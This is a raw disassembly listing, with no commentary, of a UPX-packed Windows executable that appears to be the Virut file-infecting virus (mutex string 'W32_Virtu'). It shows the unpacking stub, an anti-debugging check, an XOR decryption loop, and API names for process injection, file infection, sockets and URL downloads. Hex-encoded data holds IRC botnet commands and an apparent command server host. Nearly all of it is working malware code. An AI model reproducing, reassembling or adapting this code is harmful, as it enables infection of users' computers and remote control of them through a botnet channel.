dd 876545DCh, 30B0005h, 0FFFF4810h, 10B8EF62h, 50B0EB8h
dd 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F63FF0BEh, 0F52ED94Fh
dd 8A885D5Fh, 11C91CEBh, 2B3CE89Fh, 3E604810h, 0D1CBD917h
dd 60A3F40Ch, 1E400CA0h, 0CA04AF2h, 9DFF0CB1h, 0A000191Ch
dd 40880Ch, 3EC0009h, 7C93C23Dh, 14950007h, 707C4F40h
dd 6452F640h, 700BF83h, 0E13C1343h, 8578447Fh, 5BAB0013h
dd 1013E9A6h, 4E78CF8h, 0FEFF2FF2h, 1860230Eh, 0BE406A2Ch
dd 0E9F28408h, 4388E93Eh, 0FFEE10B9h, 3010B801h, 0C793C9Bh
dd 70DAD20h, 0F90AF2CFh, 18D80F7Fh, 0C8847001h, 0F92BC87h
dd 0F950F84h, 7E4F2600h, 847F0203h, 6F0F6C0Fh, 0C3C255h
dd 436FA89Ah, 6446049Fh, 6E691F13h, 536D5058h, 5020E560h
dd 44460072h
dd 4227E401h, 6B32399Eh, 7515123Ch, 4206BD02h, 53419Eh
dd 57FF941Ch, 0EB01910Eh, 5C5CC606h, 695C7325h, 0FFFCBA70h
dd 662463CDh, 71CEC81h, 5300E4FFh, 62654465h, 76696775h
dd 9A8C7D1Bh, 41A76785h, 61756A64h, 4CDB7254h, 656B6FF6h
dd 4C73176Eh, 7075126Fh, 4FEEDFB6h, 756C6156h, 4F174165h
dd 636F2870h, 752C7324h, 34C6A4h, 3F617643h, 0A951B233h
dd 4C79E318h, 168DFC6Dh, 11651E88h, 6172545Fh, 96DA5779h
dd 17354AEAh, 1A613143h, 0DDCEA952h, 56F6896h, 140C6854h
dd 0B5BA7356h, 58DB51ADh, 454F2841h, 0B6B3D278h, 6E3A7799h
dd 0F3F54735h, 344B891Eh, 545448FAh, 203C7F50h, 0A95A5732h
dd 4F207EF7h, 10A0D4Bh, 0B3449F4Bh, 2DDB56Fh, 67044C2Dh
dd 25203A2Dh, 3DAD1875h, 282F652Ch, 26B57954h, 6D5B5336h
dd 638670A3h, 0F72F1583h, 2AD4754h, 72932DC7h, 58C5A1C9h
dd 47579F2Bh, 0A3DD2B00h, 0F6F451ADh, 73CBE564h, 2BFDA165h
dd 76736D8Dh, 77CBA963h, 0A9C5BBEEh, 3203F169h, 0E775175Fh
dd 6CD34DBDh, 34353603h, 6EBB6933h, 7CE9A69h, 30313203h
dd 0C8322B39h, 38CEE7h, 343507E5h, 0C8320C8h, 26313233h
dd 30320EA4h, 3ADB7837h, 0A56B3FFEh, 53A3C1B4h, 5754464Fh
dd 5C455241h, 0B160694Dh, 6FE9556Dh, 0C3A75CBFh, 5CFDD6DDh
dd 72727543h, 73C456FDh, 75525CF2h, 0ED0C3ACh, 0E455C48Bh
dd 0F64D1B8Fh, 6E67BFB6h, 6A726473h, 0E2652379h, 12D85300h
dd 0E649CAF6h, 0AD6C0E57h, 2D60A15Ch, 0E357467Fh, 0CDC03770h
dd 20534449h, 20672E43h, 0B7B3F576h, 760BEB95h, 9D325048h
dd 0DB25EC63h, 105320DCh, 1A1B6544h, 96E66F87h, 12172385h
dd 0E3634683h, 407379C7h, 20334200h, 71AD318Fh, 1323B58Bh
dd 48206D1Bh, 0B0180506h, 44378242h, 0B773D9B0h, 66DE208Dh
dd 9C6D672Fh, 0FED6632Ah, 63242D85h, 7974690Ah, 6E614D20h
dd 404D1A1Eh, 0D22276h, 0E306DBC4h, 0EC408B74h, 0C65B446h
dd 0C65B6370h, 53470DF9h, 0E9B66F4Dh, 65871BA6h, 614E6B46h
dd 6C01686Dh, 35C177DFh, 956372E0h, 79705F0Ah, 0C96E4919h
dd 28D10AB9h, 0DA4E3265h, 81A5D346h, 70676C6Fh, 41D8538Ch
dd 8A8D856Ah, 9C192768h, 6B42BA99h, 0FD33212h, 0B0188F54h
dd 2C35AE60h, 1E4E2118h, 885B05B6h, 41616974h, 0B6764554h
dd 3F19F0B0h, 4632616Bh, 0E63C5363h, 67DBDAE8h, 6A624F7Bh
dd 1442C76h, 0C3317322h, 0B548DB0h, 0DEF6C83Ah, 48DB42C2h
dd 470C645Eh, 0DB61DE24h, 6E085E4Bh, 355A61D2h, 0F0E09C74h
dd 635244C7h, 0B63679C8h, 0E4149856h, 4E492B1Fh, 76C3866Fh
dd 9530FEBh, 49067065h, 0CD9326CCh, 641C5B82h, 6EB32845h
dd 6630592Eh, 12E0E836h, 7AD1AC47h, 0FD8DA0Bh, 0AF66C13Bh
dd 62694CF1h, 2BB5671Ah, 0B5CD5808h, 137C824Dh, 59B3DAD5h
dd 63CF8E40h, 74816954h, 8816D61Dh, 4DDE6575h, 0D9B278E9h
dd 0D23424ACh, 8B305D0Dh, 39C45ED0h, 9B09624Fh, 455A8795h
dd 0B8DF3178h, 0A6A56B1h, 522D906Ah, 0E785D91Bh, 87B5926h
dd 38657A86h, 0B03885B5h, 45154CA7h, 64DF67FCh, 0D16FC3A3h
dd 4BA1673Ah, 0E773808Bh, 10457965h, 970FC186h, 510ED6B0h
dd 9E11F60Ah, 0B0109B16h, 1021E730h, 61DEDDA1h, 410C51E0h
dd 34BE6E62h, 0E4040A15h, 0A6E6104h, 62205B3h, 36777463h
dd 3582FB6Ch, 440A1089h, 5A0E6112h, 8AD7F6C7h, 0CA796669h
dd 2B758F67h, 0C3686DECh, 6FCE6C36h, 11112C79h, 6F2DECEEh
dd 0FF8F5210h, 0EA071ECh, 4114B4D0h, 69757163h, 0B0E95C72h
dd 35494D21h, 0B34F86A0h, 0DE133AE0h, 0CA7273ECh, 6DA39C31h
dd 35B26D06h, 33B4920Eh, 530F62D7h, 445F1D4Dh, 2B70E066h
dd 685F3F58h, 8527F9F6h, 22E6236h, 0AE727907h, 9C53572Ch
dd 5946C4E9h, 69A0395Dh, 65271DC6h, 0C5984C0Eh, 0A141586h
dd 0DCB615E7h, 6649B420h, 62057090h, 0B1BB669Ch, 0F44F4166h
dd 6D850424h, 855A0E0Fh, 11419B55h, 0B01484B0h, 6E14670Eh
dd 6BDC1A98h, 43496E03h, 32507453h, 1A811996h, 50D6CB47h
dd 6A3C0D8Ch, 0D020273h, 2CB2CB2Ch, 346F3901h, 0CB2CB217h
dd 4090CB2h, 1D5B1013h, 3616CAA4h, 4C964550h, 378B0FF3h
dd 40D47E4Dh, 0F00E069h, 0B0010B01h, 26403A33h, 0B2306B8h
dd 588AD7D1h, 20B0725h, 96CDECB7h, 0C50074Ah, 0B037811Eh
dd 7103433h, 84069B06h, 2D042F2Ch, 85718B8Ch, 17C64EDh
dd 0E26A2E1Eh, 0AC1A9230h, 17269024h, 4DE3DB90h, 2EE0049Fh
dd 0E4FBE164h, 616EBF0Fh, 272A2B5Fh, 0C04C016h, 0CC00002Fh
dd 9C33612h, 0FF000000h, 0
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_30905000
lea edi, [esi-4000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_30906B32
; ---------------------------------------------------------------------------
align 8
loc_30906B28: ; CODE XREF: UPX1:loc_30906B39�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_30906B2E: ; CODE XREF: UPX1:30906BC6�j
; UPX1:30906BDD�j
add ebx, ebx
jnz short loc_30906B39
loc_30906B32: ; CODE XREF: UPX1:30906B20�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B39: ; CODE XREF: UPX1:30906B30�j
jb short loc_30906B28
mov eax, 1
loc_30906B40: ; CODE XREF: UPX1:30906B4F�j
; UPX1:30906B5A�j
add ebx, ebx
jnz short loc_30906B4B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B4B: ; CODE XREF: UPX1:30906B42�j
adc eax, eax
add ebx, ebx
jnb short loc_30906B40
jnz short loc_30906B5C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_30906B40
loc_30906B5C: ; CODE XREF: UPX1:30906B51�j
xor ecx, ecx
sub eax, 3
jb short loc_30906B70
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_30906BE2
mov ebp, eax
loc_30906B70: ; CODE XREF: UPX1:30906B61�j
add ebx, ebx
jnz short loc_30906B7B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B7B: ; CODE XREF: UPX1:30906B72�j
adc ecx, ecx
add ebx, ebx
jnz short loc_30906B88
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B88: ; CODE XREF: UPX1:30906B7F�j
adc ecx, ecx
jnz short loc_30906BAC
inc ecx
loc_30906B8D: ; CODE XREF: UPX1:30906B9C�j
; UPX1:30906BA7�j
add ebx, ebx
jnz short loc_30906B98
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B98: ; CODE XREF: UPX1:30906B8F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_30906B8D
jnz short loc_30906BA9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_30906B8D
loc_30906BA9: ; CODE XREF: UPX1:30906B9E�j
add ecx, 2
loc_30906BAC: ; CODE XREF: UPX1:30906B8A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_30906BCC
loc_30906BBD: ; CODE XREF: UPX1:30906BC4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_30906BBD
jmp loc_30906B2E
; ---------------------------------------------------------------------------
align 4
loc_30906BCC: ; CODE XREF: UPX1:30906BBB�j
; UPX1:30906BD9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_30906BCC
add edi, ecx
jmp loc_30906B2E
; ---------------------------------------------------------------------------
loc_30906BE2: ; CODE XREF: UPX1:30906B6C�j
pop esi
mov edi, esi
mov ecx, 8Ch
loc_30906BEA: ; CODE XREF: UPX1:30906BF1�j
; UPX1:30906BF6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_30906BEF: ; CODE XREF: UPX1:30906C14�j
cmp al, 1
ja short loc_30906BEA
cmp byte ptr [edi], 1
jnz short loc_30906BEA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_30906BEF
lea edi, [esi+4000h]
loc_30906C1C: ; CODE XREF: UPX1:30906C3E�j
mov eax, [edi]
or eax, eax
jz short loc_30906C67
mov ebx, [edi+4]
lea eax, [eax+esi+6000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+608Ch]
xchg eax, ebp
loc_30906C39: ; CODE XREF: UPX1:30906C5F�j
mov al, [edi]
inc edi
or al, al
jz short loc_30906C1C
mov ecx, edi
jns short near ptr loc_30906C4A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_30906C4A: ; CODE XREF: UPX1:30906C42�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+6090h]
or eax, eax
jz short loc_30906C61
mov [ebx], eax
add ebx, 4
jmp short loc_30906C39
; ---------------------------------------------------------------------------
loc_30906C61: ; CODE XREF: UPX1:30906C58�j
call dword ptr [esi+6094h]
loc_30906C67: ; CODE XREF: UPX1:30906C20�j
popa
jmp loc_30902305
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00007000)
; Virtual size : 00009000 ( 36864.)
; Section size in file : 00009000 ( 36864.)
; Offset to raw data for section: 00007000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 30907000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 70C4h, 708Ch, 3 dup(0)
dd 70D1h, 709Ch, 3 dup(0)
dd 70DEh, 70A4h, 3 dup(0)
dd 70E9h, 70ACh, 3 dup(0)
dd 70F4h, 70B4h, 3 dup(0)
dd 7100h, 70BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
public start
start:
pop ebx
call loc_3090725F
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: UPX2:3090720F�j
jmp short near ptr loc_3090720A+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_3090725E
call $+5
pop ebp
sub ebp, 402320h
mov eax, [ebp+402367h]
add eax, [ebp+40236Fh]
mov esi, eax
mov eax, [ebp+40236Bh]
add eax, [ebp+40236Fh]
push eax
mov edi, esi
xor ecx, ecx
loc_3090724D: ; CODE XREF: UPX2:3090725C�j
lodsb
xor al, [ebp+402377h]
stosb
inc ecx
cmp ecx, [ebp+402373h]
jl short loc_3090724D
locret_3090725E: ; CODE XREF: UPX2:30907220�j
retn
; ---------------------------------------------------------------------------
loc_3090725F: ; CODE XREF: UPX2:30907201�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], dl
add [eax], dl
imul eax, [eax], 0
; ---------------------------------------------------------------------------
dw 0
db 90h
db 30h, 0, 1Eh
dd 90380000h, 0E8h, 24048B00h, 242B80F7h, 0
dd 98898000h, 29ACh, 4245C8Bh, 59FC2D74h, 29B0B089h, 0B8890000h
dd 29B4h, 242FB880h, 75E80000h, 3098030Dh, 8B000024h, 33FF025Bh
dd 988B08EBh, 2431h, 555B33FFh, 246C8195h, 8504h, 0E38100h
dd 81FFFFF0h, 401006EDh, 247C8B00h, 3CB58D04h, 0B9004034h
dd 36h, 7B81A4F3h, 6968544Eh, 8B0D7573h, 48D3C43h, 38816618h
dd 8744550h, 100EB81h, 0E2750000h, 378508Bh, 20728BD3h
dd 3184A8Bh, 3AD51F3h, 0FF7881C3h, 74654700h, 78811B75h
dd 6F725003h, 81127563h, 64410778h, 9757264h, 650B7881h
dd 74007373h, 59D7E205h, 0C29C35Dh, 24728B24h, 0FF30359h
dd 8B4E04B7h, 0FB031C7Ah, 387348Bh, 0CE8F3h, 6C430000h
dd 4865736Fh, 6C646E61h, 0FF530065h, 3C8589D6h, 0E8004035h
dd 0Dh, 61657243h, 76456574h, 41746E65h, 0D6FF5300h, 35408589h
dd 0DE80040h, 47000000h, 614C7465h, 72457473h, 726F72h
dd 89D6FF53h, 40354485h, 70E800h, 0C0850000h, 0FF502174h
dd 40354495h, 75C08500h, 0D2858D10h, 8A004011h, 6EE8FF50h
dd 0EB000000h, 3C95FF7Ch, 0F7004035h, 40343185h, 0
; ---------------------------------------------------------------------------
xor byte ptr [esi+ebx-73h], 0B5h
xor eax, 8B004034h
jl short loc_30907414
add al, 0A4h
movsd
mov ebx, [ebp+4039B2h]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
pop ebp
retn
; ---------------------------------------------------------------------------
db 5Ah
aJjjj:
unicode 0, <jjjj>
dd 4000168h
; ---------------------------------------------------------------------------
loc_30907414: ; CODE XREF: UPX2:309073EE�j
add [ebx+50006AC4h], cl
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
align 2
dw 0C933h
dd 0FFFFDAE8h, 0A1958DFFh, 52004011h, 0FF505151h, 40354095h
dd 20C48300h, 0B9F28AC3h, 225Fh, 2401030h, 0C3F9E2D6h
dd 80A583D0h, 4015h, 1584A583h, 83000040h, 401588A5h, 858B0000h
dd 403431h, 16AC933h, 858F20B1h, 40397Eh, 0E8D1D233h, 0C0C2920Fh
dd 950103E2h, 40397Eh, 0C657EEE2h, 40130385h, 0B5890100h
dd 403548h, 15BBB58Dh, 0C9330040h, 3558BD8Dh, 1EB10040h
dd 35EE8h, 95FF5F00h, 403594h, 0F1FE8C1h, 0D484h, 14478B00h
dd 0C303406Ah, 100068h, 50858908h, 68004035h, 69CEh, 95FF006Ah
dd 4035C8h, 840FC085h, 0FFFFFEF1h, 0B58D97h, 8B004010h
dd 0A74B9EFh, 0ED810000h, 401000h, 1283958Dh, 0A5F30040h
dd 0EC83E2FFh, 6AFC8B20h, 59C03308h, 1A3D958Dh, 0ABF30040h
dd 5789FC8Bh, 1C47FE10h, 36857h, 95FF0001h, 403550h, 8520C483h
dd 0A2840FC0h, 97FFFFFEh, 16A006Ah, 40068h, 6880h, 95FF0001h
dd 403550h, 840FC085h, 0FFFFFE85h, 6850006Ah, 40000h, 0E8C1006Ah
dd 16A570Ch, 16850h, 95FF0001h, 403550h, 1000A68h, 5095FF00h
dd 0E8004035h, 5, 0FFFE54E9h, 59016AFFh, 0A6A0AE3h, 35BC95FFh
dd 0F1EB0040h, 70BD83C3h, 4035h, 0FE37840Fh, 6E8FFFFh
dd 4E000000h, 4C4C4454h, 8895FF00h, 8D004035h, 401773B5h
dd 8DC93300h, 4035D0BDh, 930BB100h, 246E8h, 0F8BD8300h
dd 4035h, 0FE03840Fh, 858BFFFFh, 4035D4h, 8F0170FFh, 40339585h
dd 0E8858B00h, 0FF004035h, 858F0170h, 4033E2h, 35D8858Bh
dd 70FF0040h, 0E9858F01h, 8B004033h, 4035DC8Dh, 0FF09E300h
dd 858F0171h, 4033F6h, 0FFFDF2E8h, 4EBD8DFFh, 8B004036h
dd 0F6006ACFh, 470FFD9h, 6A03E183h, 57F90340h, 186A006Ah
dd 159FB58Dh, 1CB90040h, 8B000000h, 4D048DD4h, 0FFFFFFFEh
dd 48DAB66h, 4Dh, 8DAB6600h, 32AB0447h, 0AB66ACE4h, 6AFBE2h
dd 69CE68h, 6ACC8B00h, 6AC48B00h, 6800h, 406A0800h, 0E6A5251h
dd 0E095FF50h, 58004035h, 6840C483h, 69CEh, 6AD48Bh, 406ACC8Bh
dd 26A006Ah, 68006A52h, 69CEh, 6A51006Ah, 95FF50FFh, 4035E4h
dd 0FF85595Fh, 0FD27840Fh, 0B58DFFFFh, 401000h, 0A74B9h
dd 0F3EF8B00h, 0ED81A5h, 8D004010h, 40144C85h, 8DE0FF00h
dd 4018E095h, 95FF5200h, 40359Ch, 16E8h, 6F6F4C00h, 5070756Bh
dd 69766972h, 6567656Ch, 756C6156h, 50004165h, 354895FFh
dd 85890040h, 40354Ch, 206A5450h, 95FFFF6Ah, 4035ECh, 755FC085h
dd 26A963Fh, 0D48B5656h, 0E852016Ah, 11h, 65446553h, 50677562h
dd 69766972h, 6567656Ch, 95FF5600h, 40354Ch, 5656C48Bh
dd 57565056h, 35D095FFh, 0C4830040h, 95FF5710h, 40353Ch
dd 26A006Ah, 357095FFh, 28B90040h, 97000001h, 0C89E12Bh
dd 0FF575424h, 4035AC95h, 83F63300h, 40363CA5h, 57540000h
dd 35B095FFh, 0C0850040h, 83465C74h, 0EE7204FEh, 82474FFh
dd 2A6A006Ah, 35A895FFh, 0C0850040h, 0E893DC74h, 43Dh
dd 0E391C933h, 3C853930h, 75004036h, 0AEC18128h, 5000000Dh
dd 51565054h, 0FF535050h, 40356895h, 59C08500h, 74FF0F74h
dd 858F0824h, 40363Ch, 0FFFDACE8h, 95FF53FFh, 40353Ch
dd 0C48198EBh, 128h, 3C95FF57h, 0E9004035h, 0FFFFFBE5h
dd 5800498Dh, 0CE005858h, 65000029h, 0Dh, 2 dup(0)
db 0
db 2 dup(0), 51h
dd 95FF5356h, 403548h
; ---------------------------------------------------------------------------
stosd
pop ecx
loc_30907816: ; CODE XREF: UPX2:30907819�j
lodsb
test al, al
jnz short loc_30907816
; ---------------------------------------------------------------------------
aTuBasenamedobj db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_30907BA6 proc near ; CODE XREF: UPX2:30907C4D�p
; UPX2:30907C5E�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_30907BA6 endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_30907C89
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_30907C89
mov ecx, [ebp+401588h]
jecxz short loc_30907C41
lea edx, [ebp+401000h]
add edx, ecx
push edi
push ebx
call edx
loc_30907C41: ; CODE XREF: UPX2:30907C33�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_30907BA6
mov eax, [ebp+4035E8h]
lea ecx, [edi+23E1h]
call sub_30907BA6
mov eax, [ebp+4035D8h]
lea ecx, [edi+23E8h]
call sub_30907BA6
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_30907C89
lea ecx, [edi+23F5h]
call sub_30907BA6
loc_30907C89: ; CODE XREF: UPX2:30907BF3�j
; UPX2:30907C2B�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 401A43EDh, 8DFF6A00h, 401A0E95h
dd 0CD525000h, 2A002420h, 0CC48300h, 5485C766h, 0CD00401Ah
dd 5685C720h, 2400401Ah, 5D002A00h, 6A016AC3h, 0FF33FF01h
dd 15FF0473h, 0F074C085h, 0B68h, 5BD08B00h, 8D3C5003h
dd 401A72B5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C783C2EBh, 0D48B570Fh
dd 50CC8B53h, 51406A54h, 0FFFF6A52h, 4035F095h, 0CC48300h
dd 3574958Bh, 0D72B0040h, 0C707EA83h, 0E8006A07h, 3578900h
dd 581A6AC3h, 9E8h, 61428D00h, 75C9FEAAh
db 0F0h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_30907D6E proc near ; CODE XREF: sub_309085D9+1B�p
; sub_30908751+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_30907D6E endp
; ---------------------------------------------------------------------------
dw 0E855h
align 8
dd 9ED815Dh, 8B00401Bh, 40364A9Dh, 247C8300h, 840F0008h
dd 0B9h, 208EC81h, 68540000h, 104h, 359095FFh, 0FC8B0040h
dd 424848Dh, 50000001h, 4E8006Ah, 56000000h, 57005452h
dd 358C95FFh, 0C9330040h, 104978Dh, 51510000h, 6A51026Ah
dd 6801h, 0FF524000h, 40355C95h, 0F6859600h, 54505B74h
dd 10468h, 0B4FF5700h, 22024h, 2895FF00h, 59004036h, 1674C085h
dd 8B5014E3h, 52006AD4h, 0FF565751h, 4035CC95h, 0C0855900h
dd 0FF56D075h, 40353C95h, 44578D00h, 446A5752h, 4978D58h
dd 0AB000001h, 106AC033h, 50ABF359h, 50505050h, 0FF525050h
dd 40356495h, 8C48100h, 0FF000002h, 0FF082474h, 40361895h
dd 95FF5300h, 403618h, 4C25Dh, 750A3E80h, 8D8B4601h, 401584h
dd 958D19E3h, 401000h, 0FF56D103h, 0FC084D2h, 11F88h, 10840F00h
dd 80000001h, 10753A3Eh, 3E8046h, 101840Fh, 3E800000h
dd 46F17520h, 49503E81h, 4275474Eh, 46C6CF8Bh, 0CE2B4F01h
dd 51006A51h, 95FF5356h, 403610h, 0FC13B59h, 0DF85h, 0A2858D00h
dd 6A00401Dh, 0C6800h, 53500000h, 361095FFh, 0C3D0040h
dd 0F000000h, 0BF85h, 0B1E900h, 3E810000h, 56495250h, 0A5850Fh
dd 0C6830000h, 0D3CAC08h, 99840Fh, 203C0000h, 3CACF375h
dd 8C850F3Ah, 0AD000000h, 2020200Dh, 67213D20h, 7F757465h
dd 75203CACh, 0FF7E817Ch, 74746820h, 7E817175h, 2F3A7003h
dd 0C668752Fh, 0F00FF47h, 2710BA31h, 0E2F70000h, 0BC95FF52h
dd 33004035h, 505050C0h, 9E850h, 6F440000h, 6F6C6E77h
dd 0FF006461h, 40362095h, 74C08500h, 89C93336h, 40364A85h
dd 685100h, 51800002h, 0FF505651h, 40362495h, 3958D00h
dd 5000401Bh, 5154C933h, 51515250h, 356C95FFh, 4870040h
dd 3C95FF24h, 0F8004035h, 778D80C3h, 1004015h, 4F53C3F9h
dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
dd 6C707845h, 7265726Fh, 72615400h, 48746567h, 74736Fh
dd 0F0FF0002h, 100007Fh, 786F7270h, 692E6D69h, 61676372h
dd 7978616Ch, 6C702Eh, 4B43494Eh, 71686420h, 63656776h
dd 53550A6Fh, 74205245h, 35303230h, 2E203130h, 3A202E20h
dd 494F4A2Dh, 7626204Eh, 75747269h, 0E8550Ah, 5D000000h
dd 1DB4ED81h, 85C60040h, 401577h, 9495FF00h, 0C1004035h
dd 3C741FE8h, 0B58B1E6Ah, 403550h, 2E3CAC59h, 81662A75h
dd 751DFF3Eh, 40BD8D23h, 8B004036h, 0A5570276h, 858DA566h
dd 40336Ah, 3390858Fh, 89FA0040h, 4E8CFA46h, 1B1FBFEh
dd 43EBCFE2h, 15B1858Dh, 6A500040h, 0FF0E6A00h, 4035A495h
dd 247C8300h, 2B750408h, 4E8h, 43465300h, 8895FF00h, 0E8004035h
dd 0FFFFFC48h, 7E8h, 43465300h, 534F5Fh, 358895FFh, 31E80040h
dd 0E8FFFFFCh, 0FFFFF356h, 13038DFFh, 0BE80040h, 55000000h
dd 33524553h, 4C442E32h, 95FF004Ch, 40359Ch, 0AE8h, 70737700h
dd 746E6972h, 50004166h, 354895FFh, 85890040h, 403554h
